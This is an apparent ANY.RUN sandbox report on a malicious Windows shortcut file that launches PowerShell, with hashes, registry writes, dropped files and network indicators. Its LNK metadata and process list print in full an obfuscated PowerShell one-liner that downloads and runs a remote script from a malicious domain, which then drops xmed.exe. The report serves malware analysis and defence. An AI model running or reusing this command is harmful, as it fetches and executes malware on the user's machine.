analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ac59b73328327d9bcfd35c12d299936cff609cbc2c528b65c7721995c46ef255

Full analysis: https://app.any.run/tasks/1be47eda-7909-4f08-9efa-9ac80a19d040
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: September 11, 2019, 02:17:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
opendir
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=14, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
MD5:

20C71F4A746FA882B705D28A1C55C764

SHA1:

820C51214AEC75478F306AB687FCFD0E16498902

SHA256:

AC59B73328327D9BCFD35C12D299936CFF609CBC2C528B65C7721995C46EF255

SSDEEP:

24:8r/BHYVKVW/+/CWMlCe/DfyMK6DSZPRPIwF+tlr+/E4I0arabxa:8b5aJJ1SZPRPIA+XrAIZak

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • xmed.exe (PID: 3532)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3032)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3032)
    • PowerShell script executed

      • powershell.exe (PID: 3032)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

IconFileName: C:\Windows\System32\imageres.dll
CommandLineArguments: -ExecutionPolicy UnRestricted -Windo 1 $gn=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $gn;$jfv=((New-Object Net.WebClient)).DownloadString('http://globalpaymentportal.co/ACH/remittance.ps1');s $jfv
WorkingDirectory: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
RelativePath: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Description: RjTuaDfI
TargetFileDOSName: powershell.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 14
TargetFileSize: -
FileAttributes: (none)
Flags: IDList, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpIcon
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
2
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start powershell.exe xmed.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3032"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $gn=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $gn;$jfv=((New-Object Net.WebClient)).DownloadString('http://globalpaymentportal.co/ACH/remittance.ps1');s $jfvC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3532"C:\Users\Public\xmed.exe"C:\Users\Public\xmed.exepowershell.exe
User:
admin
Company:
iLocal, Inc
Integrity Level:
MEDIUM
Description:
Windows Disk Image Burning Tool
Exit code:
0
Version:
9.4.5.6
Total events
453
Read events
388
Write events
65
Delete events
0

Modification events

(PID) Process:(3032) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3032) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
Executable files
1
Suspicious files
1
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3032powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WF4VGKQ1EU068MMQ4JHY.temp
MD5:
SHA256:
3032powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\c5730e2e02e5478f.customDestinations-msbinary
MD5:728CE16E8CBC847AAE3734E84B876B62
SHA256:ECB70A9C54FAE4099880746A5F8F3643187ADFDB70A65A04D7518F3B595C4308
3032powershell.exeC:\Users\Public\xmed.exeexecutable
MD5:97600DCCE4D9B81F8870232EC24C4CC0
SHA256:6B4FA9271D11536E91F5CC8AF83825ACA33FBCD68B8C61C741F52CA7749A271F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3032
powershell.exe
GET
200
68.65.123.232:80
http://globalpaymentportal.co/ACH/remittance.ps1
US
text
828 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3032
powershell.exe
68.65.123.232:80
globalpaymentportal.co
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
globalpaymentportal.co
  • 68.65.123.232
malicious

Threats

PID
Process
Class
Message
3032
powershell.exe
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
3032
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
2 ETPRO signatures available at the full report
No debug info